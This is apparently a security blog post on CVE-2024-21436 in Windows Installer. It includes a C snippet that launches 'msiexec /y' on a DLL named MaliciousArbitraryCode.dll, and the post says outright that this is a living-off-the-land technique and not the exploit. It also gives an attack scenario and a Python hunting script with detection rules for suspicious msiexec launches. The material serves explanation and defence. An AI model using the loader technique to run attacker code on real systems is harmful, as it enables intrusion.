We've come across an interesting vulnerability labeled CVE-2024-21436, a Windows Installer elevation of privilege flaw. In this long-read post, we'll examine the code snippet, walk through what it actually does, and provide the original references. Our primary goal is to dissect this vulnerability while keeping the explanation comprehensible and straightforward.

Before diving in, let's briefly discuss what an Elevation of Privilege vulnerability is. Essentially, it's a security hole that lets an attacker who already has some access to a system (for example, code running as a standard user) obtain permissions higher than those they were granted. This can lead to the execution of arbitrary code with those higher permissions and to unauthorized manipulation of the target system.

Now, let's delve into CVE-2024-21436 and see how this particular vulnerability works in Windows Installer.

Exploit Details – The Who, What, Where

CVE-2024-21436 (Common Vulnerabilities and Exposures): a vulnerability in Microsoft Windows Installer that allows a local attacker who can already run code as a standard user to gain elevated privileges, and with them the ability to install software, alter the system, and potentially compromise sensitive data.

Original references

- https://nvd.nist.gov/vuln/detail/CVE-2024-21436
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21436

The vulnerability affects Windows Installer on multiple supported Windows client and server versions; the MSRC advisory linked above lists the affected products and the corresponding updates.

Let's consider the post's code snippet. Note up front that it does not exercise the Installer flaw itself: what it does is launch msiexec.exe with the /y switch, which asks Windows Installer to load a DLL and call its DllRegisterServer export.

#include <Windows.h>
#include <tchar.h>
#include <stdio.h>   /* _tprintf */

int _tmain(int argc, _TCHAR* argv[])
{
    /* msiexec /y <dll> is the "register module" option: msiexec loads the DLL
       into its own process and calls its DllRegisterServer export. The buffer
       must be writable because CreateProcessW may modify lpCommandLine. */
    WCHAR szCommandLine[] = L"msiexec /y \"C:\\MaliciousArbitraryCode.dll\"";

    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    si.cb = sizeof(si);

    /* No elevation is requested here: msiexec inherits the caller's token, so
       whatever the DLL does runs with the same privileges as this program. */
    if (!CreateProcessW(
           L"C:\\Windows\\System32\\msiexec.exe",
           szCommandLine,
           NULL,
           NULL,
           FALSE,
           CREATE_NEW_CONSOLE,
           NULL,
           NULL,
           &si,
           &pi))
    {
        _tprintf(_T("[-] Failed to start process (msiexec). Error: %lu\n"), GetLastError());
        return 1;
    }

    WaitForSingleObject(pi.hProcess, INFINITE);

    DWORD dwExitCode;
    if (!GetExitCodeProcess(pi.hProcess, &dwExitCode))
    {
        _tprintf(_T("[-] Failed to get process exit code. Error: %lu\n"), GetLastError());
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return 1;
    }

    _tprintf(_T("[+] msiexec exited with code %lu\n"), dwExitCode);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return 0;
}

In this code snippet, the attacker's program starts Microsoft's Windows Installer client (msiexec.exe) and asks it to "register" a DLL (C:\\MaliciousArbitraryCode.dll). Registering a module means msiexec loads the DLL and calls its DllRegisterServer export, so any code in that export runs. Because the process is created with a plain CreateProcessW call and no elevation request, msiexec runs with the invoking user's token, and the DLL's code therefore runs as that standard user, not as SYSTEM. On its own this is ordinary code execution through a signed Microsoft binary (a well-known living-off-the-land technique), not a privilege escalation. The public advisory does not describe the specific Installer flaw behind CVE-2024-21436, so read the snippet as "how an attacker hands code to msiexec", not as a working exploit.

The attack scenario the post outlines, with the privilege boundary made explicit:

1. The target system has a vulnerable version of Windows Installer.
2. The attacker presents the malicious DLL to the user, who unknowingly downloads the file or receives it through other means.
3. The crafted program (shown earlier) is executed on the user's system as a standard user.
4. msiexec loads the DLL and calls DllRegisterServer, so the attacker's code runs, still with the standard user's privileges.
5. Only if that code then triggers the Installer flaw does it gain elevated privileges; the Windows Installer service runs as SYSTEM, which is why Installer elevation bugs are rated as seriously as they are.
6. With elevated privileges the attacker can execute arbitrary code, modify system settings, and potentially steal sensitive information.
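Whatever the exact trigger for CVE-2024-21436 turns out to be, the scenario above and the snippet itself leave a footprint that is worth hunting for: msiexec.exe being asked to register a DLL, or install a package, from a location a standard user can write to, or being spawned by a process that has no business launching the installer. The following is an added example, not code from the original post or from Microsoft. It scores process-creation events using the documented msiexec switches (/y and /z register and unregister a DLL via DllRegisterServer and DllUnregisterServer; /i, /a and /package take a package). The field names follow the Sysmon Event ID 1 convention, the trusted-directory and suspicious-parent lists are heuristics you should tune, and the sample events are constructed.

```python
"""Hunt for suspicious msiexec.exe launches in process-creation telemetry.
Added example for this page (not from the original post or Microsoft).
Field names follow Sysmon Event ID 1; the sample events are constructed."""
from __future__ import annotations
from dataclasses import dataclass

# Directories a standard user cannot normally write to; a DLL or .msi handed
# to msiexec from anywhere else is attacker-controllable (heuristic list).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Parents that should not be spawning the installer (document handlers and
# script hosts); heuristic list, extend it for your environment.
SUSPICIOUS_PARENTS = ("\\winword.exe", "\\excel.exe", "\\outlook.exe",
                      "\\wscript.exe", "\\mshta.exe")


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes.
    (shlex is POSIX-oriented and eats backslashes, so this is done by hand.)"""
    tokens: list[str] = []
    cur: list[str] = []
    in_quotes = False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def is_trusted_path(path: str) -> bool:
    return path.lower().replace("/", "\\").startswith(TRUSTED_PREFIXES)


def analyze_event(event: dict) -> list[Finding]:
    """Return findings for one process-creation event (empty unless msiexec)."""
    if not event["Image"].lower().endswith("\\msiexec.exe"):
        return []
    pid, findings = event["ProcessId"], []
    args = split_cmdline(event["CommandLine"])[1:]  # drop argv[0]
    i = 0
    while i < len(args):
        sw = args[i].lower()
        if sw.startswith("-"):  # msiexec accepts '-' as well as '/'
            sw = "/" + sw[1:]
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if sw in ("/y", "/z"):  # load DLL, call Dll(Un)RegisterServer as caller
            action = "register" if sw == "/y" else "unregister"
            if not is_trusted_path(nxt):
                findings.append(Finding(pid, f"msiexec-dll-{action}",
                                        f"{action} of DLL outside trusted dirs: {nxt}"))
            i += 2
            continue
        if sw in ("/i", "/a", "/package") and nxt.lower().endswith(".msi") \
                and not is_trusted_path(nxt):
            findings.append(Finding(pid, "msiexec-untrusted-package",
                                    f"package from user-writable path: {nxt}"))
            i += 2
            continue
        i += 1
    parent = event.get("ParentImage", "").lower()
    if parent.endswith(SUSPICIOUS_PARENTS):
        findings.append(Finding(pid, "msiexec-suspicious-parent", f"spawned by {parent}"))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    return [f for e in events for f in analyze_event(e)]


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\msiexec.exe",  # the post's snippet
     "CommandLine": 'msiexec /y "C:\\MaliciousArbitraryCode.dll"',
     "ParentImage": "C:\\Users\\alice\\Downloads\\poc.exe"},
    {"ProcessId": 1984, "Image": "C:\\Windows\\system32\\msiexec.exe",  # the Installer service
     "CommandLine": "C:\\Windows\\system32\\msiexec.exe /V",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
    {"ProcessId": 5560, "Image": "C:\\Windows\\SysWOW64\\msiexec.exe",  # quiet install from %TEMP%
     "CommandLine": "msiexec /qn /i C:\\Users\\bob\\AppData\\Local\\Temp\\update.msi",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"},
    {"ProcessId": 7712, "Image": "C:\\Windows\\System32\\msiexec.exe",  # vendor uninstall hook
     "CommandLine": 'msiexec.exe /z "C:\\Program Files\\Vendor\\helper.dll"',
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} {f.rule}: {f.detail}")
```

Run against the constructed events, the first (the post's own command line) is flagged as a DLL registration from outside the trusted directories, the service's own `/V` start and the vendor's `/z` on a DLL under Program Files are ignored, and the Word-spawned quiet install from %TEMP% produces two findings. Feed it real Sysmon or 4688 data by mapping the fields; expect to tune the trusted-directory list for environments that install software outside Program Files.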

Mitigation and Prevention

Microsoft fixed this vulnerability in the March 2024 security updates (the CVE was published on 2024-03-12, the March Patch Tuesday). Install the March 2024 or a later cumulative update on every affected system; check the MSRC advisory linked above for the update that applies to each Windows version. Keep in mind that a standard user can always run msiexec.exe, so patching, not restricting the binary, is what closes the hole.

In summary, we took a look at CVE-2024-21436: Windows Installer Elevation of Privilege Vulnerability, examined what the post's snippet really does (hands a DLL to msiexec, which runs it as the calling user), noted that the actual trigger is not public, and provided its related resources. Keep in mind that staying current with security updates is a critical aspect of maintaining a secure system.

Timeline

Published on: 2024-03-12 17:15:52 UTC
Last modified on: 2024-03-12 17:46:17 UTC